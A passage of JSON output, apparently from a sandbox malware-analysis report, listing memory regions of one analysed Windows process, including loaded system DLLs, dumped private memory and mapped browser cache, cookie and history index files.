"private_memory", "start_va": 2147336192, "timestamp": "00:01:10.715", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001048-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_199", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_1048", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:01:10.715", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3391487, "entry_point": 3150477, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_1049", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 3145728, "timestamp": "00:01:10.716", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1962409984, "type": "region", "version": 1 }, "end_va": 1962651647, "entry_point": 1962414733, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_1054", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1962409984, "timestamp": "00:01:10.729", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1969618944, "type": "region", "version": 1 }, "end_va": 1969668095, "entry_point": 1969623265, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1055", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1969618944, "timestamp": "00:01:10.731", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001056-addr_0x0000000000300000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_200", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3211263, "entry_point": 0, "filename": null, "id": "region_1056", "name": "private_0x0000000000300000", "norm_filename": null, "region_type": "private_memory", "start_va": 3145728, "timestamp": "00:01:11.711", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 3244031, "entry_point": 0, "filename": null, "id": "region_1057", "name": "pagefile_0x0000000000310000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3211264, "timestamp": "00:01:11.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3178495, "entry_point": 0, "filename": null, "id": "region_1058", "name": "pagefile_0x0000000000300000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3145728, "timestamp": "00:01:11.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3153919, "entry_point": 0, "filename": null, "id": "region_1112", "name": "pagefile_0x0000000000300000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3145728, "timestamp": "00:01:11.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1953431552, "type": "region", "version": 1 }, "end_va": 1955127295, "entry_point": 1953621685, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_1113", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1953431552, "timestamp": "00:01:11.778", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001114-addr_0x0000000001930000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_201", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 26411008, "type": "region", "version": 1 }, "end_va": 27459583, "entry_point": 0, "filename": null, "id": "region_1114", "name": "private_0x0000000001930000", "norm_filename": null, "region_type": "private_memory", "start_va": 26411008, "timestamp": "00:01:11.781", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 3215359, "entry_point": 3211264, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_1115", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 3211264, "timestamp": "00:01:11.781", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 3284991, "entry_point": 0, "filename": null, "id": "region_1116", "name": "pagefile_0x0000000000320000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3276800, "timestamp": "00:01:11.783", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 3276799, "entry_point": 3211264, "filename": "\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat", "id": "region_1117", "name": "index.dat", "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 3211264, "timestamp": "00:01:11.845", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3375103, "entry_point": 3342336, "filename": "\\Users\\ATVeyDl98Z\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat", "id": "region_1118", "name": "index.dat", "norm_filename": "c:\\users\\atveydl98z\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "region_type": "memory_mapped_file", "start_va": 3342336, "timestamp": "00:01:11.846", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 3473408, "type": "region", "version": 1 }, "end_va": 3538943, "entry_point": 3473408, "filename": "\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "id": "region_1119", "name": "index.dat", "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 3473408, "timestamp": "00:01:11.848", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950879743, "entry_point": 1950749790, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_1120", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:11.858", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1981022208, "type": "region", "version": 1 }, "end_va": 1981304831, "entry_point": 1981026785, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_1121", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1981022208, "timestamp": "00:01:11.859", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1974599680, "type": "region", "version": 1 }, "end_va": 1974816767, "entry_point": 1974604893, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_1122", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1974599680, "timestamp": "00:01:11.861", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1977745408, "type": "region", "version": 1 }, "end_va": 1977769983, "entry_point": 1977751426, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_1123", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1977745408, "timestamp": "00:01:11.864", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001124-addr_0x0000000000360000-size_0x0000000000060000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_202", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 393216, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 0, "filename": null, "id": "region_1124", "name": "private_0x0000000000360000", "norm_filename": null, "region_type": "private_memory", "start_va": 3538944, "timestamp": "00:01:11.870", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 278528, "start_va": 1963327488, "type": "region", "version": 1 }, "end_va": 1963606015, "entry_point": 1963418617, "filename": "\\Windows\\System32\\dnsapi.dll", "id": "region_1125", "name": "dnsapi.dll", "norm_filename": "c:\\windows\\system32\\dnsapi.dll", "region_type": "memory_mapped_file", "start_va": 1963327488, "timestamp": "00:01:11.890", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001126-addr_0x0000000001a30000-size_0x0000000000200000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_203", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2097152, "start_va": 27459584, "type": "region", "version": 1 }, "end_va": 29556735, "entry_point": 0, "filename": null, "id": "region_1126", "name": "private_0x0000000001a30000", "norm_filename": null, "region_type": "private_memory", "start_va": 27459584, "timestamp": "00:01:11.893", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 1947205632, "type": "region", "version": 1 }, "end_va": 1947320319, "entry_point": 1947247665, "filename": "\\Windows\\System32\\IPHLPAPI.DLL", "id": "region_1127", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\system32\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 1947205632, "timestamp": "00:01:11.894", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1947140096, "type": "region", "version": 1 }, "end_va": 1947168767, "entry_point": 1947144845, "filename": "\\Windows\\System32\\winnsi.dll", "id": "region_1128", "name": "winnsi.dll", "norm_filename": "c:\\windows\\system32\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 1947140096, "timestamp": "00:01:11.896", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 2003828736, "type": "region", "version": 1 }, "end_va": 2003841023, "entry_point": 2003828736, "filename": "\\Windows\\System32\\normaliz.dll", "id": "region_1129", "name": "normaliz.dll", "norm_filename": "c:\\windows\\system32\\normaliz.dll", "region_type": "memory_mapped_file", "start_va": 2003828736, "timestamp": "00:01:11.958", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 1929183232, "type": "region", "version": 1 }, "end_va": 1929519103, "entry_point": 1929188542, "filename": "\\Windows\\System32\\rasapi32.dll", "id": "region_1130", "name": "rasapi32.dll", "norm_filename": "c:\\windows\\system32\\rasapi32.dll", "region_type": "memory_mapped_file", "start_va": 1929183232, "timestamp": "00:01:11.961", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 1929052160, "type": "region", "version": 1 }, "end_va": 1929138175, "entry_point": 1929056990, "filename": "\\Windows\\System32\\rasman.dll", "id": "region_1131", "name": "rasman.dll", "norm_filename": "c:\\windows\\system32\\rasman.dll", "region_type": "memory_mapped_file", "start_va": 1929052160, "timestamp": "00:01:11.962", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1936523264, "type": "region", "version": 1 }, "end_va": 1936576511, "entry_point": 1936528166, "filename": "\\Windows\\System32\\rtutils.dll", "id": "region_1132", "name": "rtutils.dll", "norm_filename": "c:\\windows\\system32\\rtutils.dll", "region_type": "memory_mapped_file", "start_va": 1936523264, "timestamp": "00:01:11.966", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001133-addr_0x0000000000360000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_204", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 3543039, "entry_point": 0, "filename": null, "id": "region_1133", "name": "private_0x0000000000360000", "norm_filename": null, "region_type": "private_memory", "start_va": 3538944, "timestamp": "00:01:11.974", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001134-addr_0x0000000000380000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_205", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 0, "filename": null, "id": "region_1134", "name": "private_0x0000000000380000", "norm_filename": null, "region_type": "private_memory", "start_va": 3670016, "timestamp": "00:01:11.974", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 3543039, "entry_point": 0, "filename": null, "id": "region_1135", "name": "pagefile_0x0000000000360000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3538944, "timestamp": "00:01:11.975", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1917255680, "type": "region", "version": 1 }, "end_va": 1917280255, "entry_point": 1917255680, "filename": "\\Windows\\System32\\SensApi.dll", "id": "region_1136", "name": "sensapi.dll", "norm_filename": "c:\\windows\\system32\\sensapi.dll", "region_type": "memory_mapped_file", "start_va": 1917255680, "timestamp": "00:01:11.985", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1948450816, "type": "region", "version": 1 }, "end_va": 1948516351, "entry_point": 1948465345, "filename": "\\Windows\\System32\\nlaapi.dll", "id": "region_1137", "name": "nlaapi.dll", "norm_filename": "c:\\windows\\system32\\nlaapi.dll", "region_type": "memory_mapped_file", "start_va": 1948450816, "timestamp": "00:01:12.003", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001138-addr_0x0000000001a30000-size_0x00000000000a0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_206", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 655360, "start_va": 27459584, "type": "region", "version": 1 }, "end_va": 28114943, "entry_point": 0, "filename": null, "id": "region_1138", "name": "private_0x0000000001a30000", "norm_filename": null, "region_type": "private_memory", "start_va": 27459584, "timestamp": "00:01:12.006", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001139-addr_0x0000000001bf0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_207", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 29294592, "type": "region", "version": 1 }, "end_va": 29556735, "entry_point": 0, "filename": null, "id": "region_1139", "name": "private_0x0000000001bf0000", "norm_filename": null, "region_type": "private_memory", "start_va": 29294592, "timestamp": "00:01:12.006", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001140-addr_0x0000000001ad0000-size_0x00000000000e0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_208", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 917504, "start_va": 28114944, "type": "region", "version": 1 }, "end_va": 29032447, "entry_point": 0, "filename": null, "id": "region_1140", "name": "private_0x0000000001ad0000", "norm_filename": null, "region_type": "private_memory", "start_va": 28114944, "timestamp": "00:01:12.008", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001141-addr_0x0000000001c30000-size_0x0000000000190000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_209", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1638400, "start_va": 29556736, "type": "region", "version": 1 }, "end_va": 31195135, "entry_point": 0, "filename": null, "id": "region_1141", "name": "private_0x0000000001c30000", "norm_filename": null, "region_type": "private_memory", "start_va": 29556736, "timestamp": "00:01:12.009", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001142-addr_0x0000000001c30000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_210", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 29556736, "type": "region", "version": 1 }, "end_va": 30605311, "entry_point": 0, "filename": null, "id": "region_1142", "name": "private_0x0000000001c30000", "norm_filename": null, "region_type": "private_memory", "start_va": 29556736, "timestamp": "00:01:12.018", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001143-addr_0x0000000001dc0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_211", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 31195136, "type": "region", "version": 1 }, "end_va": 32243711, "entry_point": 0, "filename": null, "id": "region_1143", "name": "private_0x0000000001dc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31195136, "timestamp": "00:01:12.018", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001144-addr_0x000000007ffd8000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_212", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147319808, "type": "region", "version": 1 }, "end_va": 2147323903, "entry_point": 0, "filename": null, "id": "region_1144", "name": "private_0x000000007ffd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147319808, "timestamp": "00:01:12.019", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001145-addr_0x000000007ffd9000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_213", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147323904, "type": "region", "version": 1 }, "end_va": 2147327999, "entry_point": 0, "filename": null, "id": "region_1145", "name": "private_0x000000007ffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147323904, "timestamp": "00:01:12.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1839333376, "type": "region", "version": 1 }, "end_va": 1839357951, "entry_point": 1839338674, "filename": "\\Windows\\System32\\rasadhlp.dll", "id": "region_1146", "name": "rasadhlp.dll", "norm_filename": "c:\\windows\\system32\\rasadhlp.dll", "region_type": "memory_mapped_file", "start_va": 1839333376, "timestamp": "00:01:12.023", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001147-addr_0x0000000001ec0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_214", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 32243712, "type": "region", "version": 1 }, "end_va": 33292287, "entry_point": 0, "filename": null, "id": "region_1147", "name": "private_0x0000000001ec0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32243712, "timestamp": "00:01:12.035", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 1938292736, "type": "region", "version": 1 }, "end_va": 1938358271, "entry_point": 1938292736, "filename": "\\Windows\\System32\\NapiNSP.dll", "id": "region_1148", "name": "napinsp.dll", "norm_filename": "c:\\windows\\system32\\napinsp.dll", "region_type": "memory_mapped_file", "start_va": 1938292736, "timestamp": "00:01:12.035", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001149-addr_0x000000007ffd7000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_215", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147315712, "type": "region", "version": 1 }, "end_va": 2147319807, "entry_point": 0, "filename": null, "id": "region_1149", "name": "private_0x000000007ffd7000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147315712, "timestamp": "00:01:12.051", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1938161664, "type": "region", "version": 1 }, "end_va": 1938235391, "entry_point": 1938161664, "filename": "\\Windows\\System32\\pnrpnsp.dll", "id": "region_1150", "name": "pnrpnsp.dll", "norm_filename": "c:\\windows\\system32\\pnrpnsp.dll", "region_type": "memory_mapped_file", "start_va": 1938161664, "timestamp": "00:01:12.055", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 245760, "start_va": 1964638208, "type": "region", "version": 1 }, "end_va": 1964883967, "entry_point": 1964643421, "filename": "\\Windows\\System32\\mswsock.dll", "id": "region_1151", "name": "mswsock.dll", "norm_filename": "c:\\windows\\system32\\mswsock.dll", "region_type": "memory_mapped_file", "start_va": 1964638208, "timestamp": "00:01:12.092", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1938096128, "type": "region", "version": 1 }, "end_va": 1938128895, "entry_point": 1938096128, "filename": "\\Windows\\System32\\winrnr.dll", "id": "region_1152", "name": "winrnr.dll", "norm_filename": "c:\\windows\\system32\\winrnr.dll", "region_type": "memory_mapped_file", "start_va": 1938096128, "timestamp": "00:01:12.095", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1959723008, "type": "region", "version": 1 }, "end_va": 1959743487, "entry_point": 1959728607, "filename": "\\Windows\\System32\\WSHTCPIP.DLL", "id": "region_1153", "name": "wshtcpip.dll", "norm_filename": "c:\\windows\\system32\\wshtcpip.dll", "region_type": "memory_mapped_file", "start_va": 1959723008, "timestamp": "00:01:12.112", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1964572672, "type": "region", "version": 1 }, "end_va": 1964597247, "entry_point": 1964578419, "filename": "\\Windows\\System32\\wship6.dll", "id": "region_1154", "name": "wship6.dll", "norm_filename": "c:\\windows\\system32\\wship6.dll", "region_type": "memory_mapped_file", "start_va": 1964572672, "timestamp": "00:01:12.114", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 229376, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946255359, "entry_point": 1946065166, "filename": "\\Windows\\System32\\FWPUCLNT.DLL", "id": "region_1155", "name": "fwpuclnt.dll", "norm_filename": "c:\\windows\\system32\\fwpuclnt.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:12.122", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 3608575, "entry_point": 0, "filename": null, "id": "region_1156", "name": "pagefile_0x0000000000370000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3604480, "timestamp": "00:01:12.175", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001157-addr_0x0000000001310000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_216", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 19988480, "type": "region", "version": 1 }, "end_va": 20250623, "entry_point": 0, "filename": null, "id": "region_1157", "name": "private_0x0000000001310000", "norm_filename": null, "region_type": "private_memory", "start_va": 19988480, "timestamp": "00:01:12.176", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984299008, "type": "region", "version": 1 }, "end_va": 1984835583, "entry_point": 1984308178, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_1158", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984299008, "timestamp": "00:01:12.176", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump 